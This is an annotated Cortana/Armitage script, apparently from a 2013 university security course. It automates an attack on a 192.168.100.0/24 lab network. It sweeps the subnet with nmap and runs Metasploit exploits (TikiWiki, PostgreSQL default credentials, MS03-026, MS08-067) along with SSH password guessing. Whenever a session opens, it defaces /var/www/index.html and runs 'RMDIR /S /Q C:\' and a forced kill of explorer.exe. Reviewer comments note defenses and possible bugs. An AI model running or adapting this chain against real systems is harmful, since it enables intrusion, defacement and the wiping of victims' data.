  1. # Cortana Script - "Time Bomb"
  2. # For IST 511 2013
  3. # Timer-driven Armitage/Cortana automation: scans 192.168.100.0/24, launches Metasploit modules at hard-coded lab hosts, then runs post-exploitation commands, some of them destructive.
  4. # Created by Patrick O'Connor
  5. # ORs flag 256 into the current debug() level; what 256 enables is not visible in this file - presumably a Sleep/Cortana trace flag, TODO confirm.
  6. debug(debug()| 256);
  7. # Once Cortana reports ready, registers two scan timers and four heartbeat_15m stages; every target, the 192.168.100.66 listener address and the wordlist path are hard-coded for a single lab network.
  8. on ready {
  9. when heartbeat_5m {
  10. # Host-discovery sweep of the /24 (-sn: no port scan, -n: no DNS lookups); db_nmap imports the results into the Metasploit database. A whole-subnet sweep from one source is an easy IDS / flow-log signal.
  11. cmd_async("db_nmap --min-hostgroup 96 -T4 -n -sn 192.168.100.0/24");
  12. }
  13. # NOTE(review): `when` is presumably Cortana's one-shot listener, so each stage would run on a single heartbeat rather than repeat - confirm against the Cortana documentation.
  14.  
  15. when heartbeat_10m {
  16. # Service and OS detection pass (-A, -T4 timing) over the same /24; much noisier on the wire and in target logs than the discovery sweep above.
  17. cmd_async("db_nmap --min-hostgroup 96 -T4 -A -v -n 192.168.100.0/24");
  18. }
  19.  
  20.  
  21. when heartbeat_15m {
  22. # tikiwiki - metasploitable. Stage 1 queues three background jobs against 192.168.100.202 from one console: a TikiWiki web exploit, SSH password guessing, and a PostgreSQL payload.
  23. println("[*] Begin tikiwiki attack");
  24. $console = console();
  25. cmd($console, "use exploit/unix/webapp/tikiwiki_graph_formula_exec");
  26. cmd_set($console, %(LHOST => "192.168.100.66",
  27. RPORT => "80",
  28. LPORT => "9079",
  29. RHOST => "192.168.100.202",
  30. PAYLOAD => "generic/shell_bind_tcp",
  31. TARGET => "0"));
  32. cmd($console, "exploit -j");
  33. # -j runs the module as a background job, so the script continues without waiting for the exploit's outcome.
  34. # Defacement step ("lulz"): five minutes after a session syncs, append an <h1> banner to /var/www/index.html. File-integrity monitoring on the web root would flag this write.
  35. on session_sync {
  36. println("[*] We have a session!");
  37. when ('heartbeat_5m', lambda({
  38. # $sid is bound to $1 (the synced session's ID) when the lambda is created, so the delayed handler still targets that session.
  39. println("[*] Adding lulz to index.html!");
  40. s_cmd($sid, "echo '<h1>lulz</h1><br>' >> /var/www/index.html");
  41. }, $sid => $1));
  42. }
  43. # NOTE(review): the session_sync listener above has no host or module filter, so it presumably runs for every session that syncs while it is registered, not only the TikiWiki one - confirm.
  44. # SSH Brute Force: ssh_login with USER_AS_PASS and only a USER_FILE, i.e. each listed username tried as its own password (24 threads, keeps going after a hit). Visible as a burst of failed logins in auth logs; key-only auth or lockout / rate limiting defeats it.
  45. println("[*] Begin SSH brute force attack");
  46. cmd($console, "use auxiliary/scanner/ssh/ssh_login");
  47. cmd_set($console, %(THREADS => "24",
  48. RPORT => "22",
  49. VERBOSE => "1",
  50. USER_AS_PASS => "1",
  51. STOP_ON_SUCCESS => "0",
  52. BRUTEFORCE_SPEED => "8",
  53. USER_FILE => "/opt/metasploit/msf3/data/wordlists/csusb_lab.txt",
  54. RHOSTS => "192.168.100.202",
  55. BLANK_PASSWORDS => "0"));
  56. cmd($console, "run -j");
  57.  
  58. # PostgreSQL Payload from SSH Creds. NOTE(review): despite the title, the options below hard-code the default postgres/postgres login and reuse nothing from the SSH stage. Changing the default password and not exposing 5432 closes this path.
  59. println("[*] Begin PostgreSQL payload attack");
  60. cmd($console, "use exploit/linux/postgres/postgres_payload");
  61. cmd_set($console, %(LHOST => "192.168.100.66",
  62. RPORT => "5432",
  63. VERBOSE => "0",
  64. LPORT => "28430",
  65. RHOST => "192.168.100.202",
  66. PAYLOAD => "generic/shell_reverse_tcp",
  67. DATABASE => "template1",
  68. TARGET => "0",
  69. USERNAME => "postgres",
  70. PASSWORD => "postgres"));
  71. cmd($console, "exploit -j");
  72. }
  73.  
  74. when heartbeat_15m {
  75. # Stage 2: DCOM RPC exploit against 192.168.100.101 on TCP 135 with a Meterpreter bind payload, followed by destructive commands on a resulting session.
  76. # Windows 2K3 DCOM Exploit ms03_026_dcom - the flaw covered by Microsoft bulletin MS03-026; patching or filtering TCP 135 removes the exposure.
  77. println("[*] Begin Windows 2K3 DCOM ms03_26_dcom attack");
  78. $console = console();
  79. cmd($console, "use exploit/windows/dcerpc/ms03_026_dcom");
  80. cmd_set($console, %(RHOST => "192.168.100.101",
  81. PAYLOAD => "windows/meterpreter/bind_tcp",
  82. LHOST => "192.168.100.66",
  83. RPORT => "135",
  84. LPORT => "20271",
  85. TARGET => "0"));
  86. cmd($console, "exploit -j");
  87.  
  88. # After a session syncs, wait for the next 5-minute heartbeat and then run the destructive commands below (the author's "clean it"). NOTE(review): the listener is not tied to this exploit's session, so it presumably fires for any session - confirm.
  89. on session_sync {
  90. println("[*] We have a session!");
  91. when ('heartbeat_5m', lambda({
  92. # $sid is bound to $1 (the synced session's ID) when the lambda is created.
  93. println("[*] Perform magic cleanup!");
  94. # Destructive, not a cleanup: RMDIR /S /Q recursively and silently deletes what it can on the C: drive, then taskkill force-terminates explorer.exe (the desktop shell). m_exec presumably runs each command through the Meterpreter session - confirm.
  95. m_exec($sid, "RMDIR /S /Q C:\\ ");
  96. println("[*] Pens down everyone.");
  97. m_exec($sid, "taskkill /f /im explorer.exe ");
  98. }, $sid => $1));
  99. }
  100. }
  101.  
  102. when heartbeat_15m {
  103. # Stage 3: SMB exploit against 192.168.100.102; only RHOST and PAYLOAD are set, every other option stays at the module default.
  104. # Windows 2k3 SMB Exploit ms08_067_netapi - the flaw covered by Microsoft bulletin MS08-067; patching or blocking inbound SMB removes the exposure.
  105. println("[*] Begin Windows 2k3 ms08_67 attack");
  106. $console = console();
  107. cmd($console, "use exploit/windows/smb/ms08_067_netapi");
  108. cmd_set($console, %(RHOST => "192.168.100.102",
  109. PAYLOAD => "windows/meterpreter/bind_tcp"));
  110. cmd($console, "exploit -j");
  111.  
  112. # Same delayed post-exploitation pattern as the DCOM stage: a second session_sync listener that schedules the destructive commands on the next 5-minute heartbeat.
  113. on session_sync {
  114. println("[*] We have a session!");
  115. when ('heartbeat_5m', lambda({
  116. # $sid is bound to $1 (the synced session's ID) when the lambda is created.
  117. println("[*] Perform magic cleanup!");
  118. # Destructive, not a cleanup: recursive silent delete of the C: drive, then a forced kill of explorer.exe.
  119. m_exec($sid, "RMDIR /S /Q C:\\ ");
  120. println("[*] Pens down everyone.");
  121. m_exec($sid, "taskkill /f /im explorer.exe ");
  122. }, $sid => $1));
  123. }
  124. }
  125. when heartbeat_15m {
  126. # Windows XP SMB Exploit ms08_067_netapi (MS08-067). NOTE(review): RHOST 192.168.100.101 is the same address the DCOM stage labels "Windows 2K3" - confirm which host this stage is meant for.
  127. println("[*] Begin Windows XP ms08_67 attack");
  128. $console = console();
  129. cmd($console, "use exploit/windows/smb/ms08_067_netapi");
  130. cmd_set($console, %(RHOST => "192.168.100.101",
  131. PAYLOAD => "windows/meterpreter/bind_tcp"));
  132. cmd($console, "exploit -j");
  133.  
  134. # Third copy of the delayed post-exploitation listener; with several such listeners registered, the destructive commands are presumably scheduled more than once per session - confirm.
  135. on session_sync {
  136. println("[*] We have a session!");
  137. when ('heartbeat_5m', lambda({
  138. # $sid is bound to $1 (the synced session's ID) when the lambda is created.
  139. println("[*] Perform magic cleanup!");
  140. # Destructive, not a cleanup: recursive silent delete of the C: drive, then a forced kill of explorer.exe.
  141. m_exec($sid, "RMDIR /S /Q C:\\ ");
  142. println("[*] Pens down everyone.");
  143. m_exec($sid, "taskkill /f /im explorer.exe ");
  144. }, $sid => $1));
  145. }
  146. }
  147. quit(); # Last statement of the ready handler; its effect on the listeners registered above is not visible in this file - TODO confirm.
  148. }